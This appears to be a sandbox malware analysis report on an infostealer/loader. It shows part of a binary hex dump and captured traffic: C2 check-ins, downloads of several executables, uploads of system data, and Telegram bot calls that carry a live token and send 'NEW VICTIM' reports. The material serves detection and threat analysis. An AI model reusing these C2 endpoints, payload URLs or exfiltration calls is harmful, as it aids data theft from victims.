00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 4a 00 00 00 20 00 00 00 4c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6a 00 00 00 00 00 00 48 00 00 00 02 00 05 00 28 37 00 00 80 32 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 2f 00 00 06 0a 06 28 16 00 00 0a 7d 20 00 00 04 06 02 7d 21 00 00 04 06 15 7d 1f 00 00 04 06 7c 20 00 00 04 12 00 28 01 00 00 2b 06 7c 20 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 84 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 ca 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 28 00 00 04 06 02 7d 29 00 00 04 06 15 7d 27 00 00 04 06 7c 28 00 00 04 12 00 28 02 00 00 2b 06 7c 28 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 f0 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 35 42 34 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A75B45A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019522001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019523001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019524001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019525001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019526001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 441903Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 38 30 31 34 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 35 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019527001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 19 Dec 2024 14:25:14 GMTIf-None-Match: "67642cca-5600"
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49787 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49789 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49788 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49808 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49812 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49826 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49819 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49841 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49866 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49893 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49922 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49925 -> 172.67.180.113:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VJVG5XOVPCVA4HARCookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18154Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CW0BCOOZ3Cookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8733Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WEH1N54GAQPRCookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20404Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2WLYPW00T2A9ZAC6Cookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1268Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DZCYSGDD3A59JCookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549929Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=gtWVZEsnoKufsWg8Bg366wpUwxeEG0nAGLM7SEqKKTg-1734801378-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: cheapptaxysu.click
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DAE0C0 recv,recv,recv,recv, 0_2_00DAE0C0
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20965543%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20965543%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 19 Dec 2024 14:25:14 GMTIf-None-Match: "67642cca-5600"
Source: 6eea3e30e9.exe, 0000000D.00000003.2601864727.000001FED9297000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 4-1b5020b1c2a0"},"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}} equals www.youtube.com (Youtube)
